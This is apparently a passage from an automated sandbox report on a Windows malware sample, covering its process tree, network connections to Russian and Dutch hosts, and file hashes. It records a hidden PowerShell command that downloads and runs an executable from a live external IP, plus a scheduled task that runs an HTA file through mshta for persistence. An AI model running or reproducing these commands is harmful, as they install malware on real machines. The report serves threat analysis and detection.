| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
Suspicious use of FindShellTrayWindow
Suspicious use of SendNotifyMessage
Suspicious use of WriteProcessMemory
Processes
C:\Windows\Explorer.EXE
C:\Windows\Explorer.EXE
C:\Users\Admin\AppData\Local\Temp\e177bcf0d2e553d675134dcd71999e0d23548c1a4860aece07208f1fe9a39c35.exe
"C:\Users\Admin\AppData\Local\Temp\e177bcf0d2e553d675134dcd71999e0d23548c1a4860aece07208f1fe9a39c35.exe"
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c schtasks /create /tn EwXBGmaLpCK /tr "mshta C:\Users\Admin\AppData\Local\Temp\mS9DEq1mn.hta" /sc minute /mo 25 /ru "Admin" /f
C:\Windows\SysWOW64\mshta.exe
mshta C:\Users\Admin\AppData\Local\Temp\mS9DEq1mn.hta
C:\Windows\SysWOW64\schtasks.exe
schtasks /create /tn EwXBGmaLpCK /tr "mshta C:\Users\Admin\AppData\Local\Temp\mS9DEq1mn.hta" /sc minute /mo 25 /ru "Admin" /f
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'7JMJCV5QKONIF4I6VPLFETKHRNBIC0ZZ.EXE';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;
C:\Users\Admin\AppData\Local\Temp7JMJCV5QKONIF4I6VPLFETKHRNBIC0ZZ.EXE
"C:\Users\Admin\AppData\Local\Temp7JMJCV5QKONIF4I6VPLFETKHRNBIC0ZZ.EXE"
C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
"C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe"
C:\Users\Admin\AppData\Local\Temp\10089420101\4klgwMz.exe
"C:\Users\Admin\AppData\Local\Temp\10089420101\4klgwMz.exe"
C:\Users\Admin\AppData\Local\Temp\10089720101\8jQumY5.exe
"C:\Users\Admin\AppData\Local\Temp\10089720101\8jQumY5.exe"
C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
C:\Users\Admin\AppData\Local\Temp\10090400101\W6ySCZP.exe
"C:\Users\Admin\AppData\Local\Temp\10090400101\W6ySCZP.exe"
C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe
"C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe"
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | tse1.mm.bing.net | udp |
| US | 8.8.8.8:53 | g.bing.com | udp |
| US | 150.171.28.10:443 | g.bing.com | tcp |
| US | 150.171.28.10:443 | g.bing.com | tcp |
| US | 150.171.28.10:443 | g.bing.com | tcp |
| US | 150.171.28.10:443 | g.bing.com | tcp |
| RU | 176.113.115.7:80 | 176.113.115.7 | tcp |
| RU | 176.113.115.6:80 | 176.113.115.6 | tcp |
| RU | 176.113.115.7:80 | 176.113.115.7 | tcp |
| US | 8.8.8.8:53 | cobolrationumelawrtewarms.com | udp |
| US | 150.171.28.10:443 | g.bing.com | tcp |
| US | 150.171.28.10:443 | g.bing.com | tcp |
| US | 150.171.28.10:443 | g.bing.com | tcp |
| US | 150.171.28.10:443 | g.bing.com | tcp |
| US | 150.171.28.10:443 | g.bing.com | tcp |
| NL | 107.189.27.66:80 | cobolrationumelawrtewarms.com | tcp |
Files
C:\Users\Admin\AppData\Local\Temp\mS9DEq1mn.hta
| MD5 | 42bcecbc4a9d0c9e72120f0a60102147 |
| SHA1 | 026d375bc2a684027fb8532af83ce2991509e1f1 |
| SHA256 | 303332f5d6160d3604c26f26245225fcdb46887b69f741b346b35948cbb1b23b |
| SHA512 | d6438e784658959e18c3b867bac7e406131011dc5146db4ce9781469e4cabee4630dd6b79106b7b507fe03e748a51516855dcae59f4ac0b2ab29416f339c4498 |
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_vad1iwme.c10.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
C:\Users\Admin\AppData\Local\Temp7JMJCV5QKONIF4I6VPLFETKHRNBIC0ZZ.EXE
| MD5 | 3147e388f1f2ad94f26aee55a4267b8c |
| SHA1 | b3dfd5bb152b1b8e338586ea1e2d240cde6503b3 |
| SHA256 | 49ac9312c49ff99d5af392d17450747038fcbd6f319ebf981916fcf44120aa2b |
| SHA512 | 720b48b08c502c153ecdaeb6fa8a2e374187a71655a88493dc70b266fe16ce88d342aaceefbe5a35fa9db93911510baee7fb578786e44ae6da637369f56443e9 |
C:\Users\Admin\AppData\Local\Temp\10089420101\4klgwMz.exe
| MD5 | 19668940080169c70b830bed8c390783 |
| SHA1 | 5e6b72e52abc7d221d512111e39cbdd3f2ad40c1 |
| SHA256 | cdbc641b8c23b5699f899b408394ecfc946af9ac7a38c5d44c78a4a938e7b02c |
| SHA512 | c322eba01ff4544b8077ec400f15ecffd3b66f89e0e0e26946224771c1ffb9c687ff4adc2e0a5e6b119766b3c8300971cfc2c990ff48346d9d3d514ab5d4bed2 |
C:\Users\Admin\AppData\Local\Temp\10089720101\8jQumY5.exe
| MD5 | e82c4c3f7a2994eeecc1f81a5e4a4180 |
| SHA1 | 660820f778073332dcd5ec446d2fcf00de887abd |
| SHA256 | 11eec5d71c7fadae9d7176448d8fff3de44ec8d3b4df86f0eca59e06adf202d3 |
| SHA512 | 4d3e42e68b9fa6330edfee677ad55ae24964c33d6fd2d25ba6c2876d80f8d9cbc999c6e27192ce58a45559d00b3c0bc71ddbee1ad8d6fd7083b705ef5cf84d76 |
C:\Users\Admin\AppData\Local\Temp\10090400101\W6ySCZP.exe
| MD5 | 02579a797e919dcaf5758fbcbe34b093 |
| SHA1 | 7668fff0888f4c7ad7a83b24f8c6d4009c10e534 |
| SHA256 | 0a63a310dfc4ce680c96f72f5b9c9559f9e6d9c3d99f48c8782ee43c56a8728c |
| SHA512 | 2b99b620ca06f03a1924c0ab2feef96142df6ff16558d30c37e8b3e5602e5d5b2ecd4e7bd3b4499ef64a0eb32cb136821442e79b3aa66caf42467c749116e5f5 |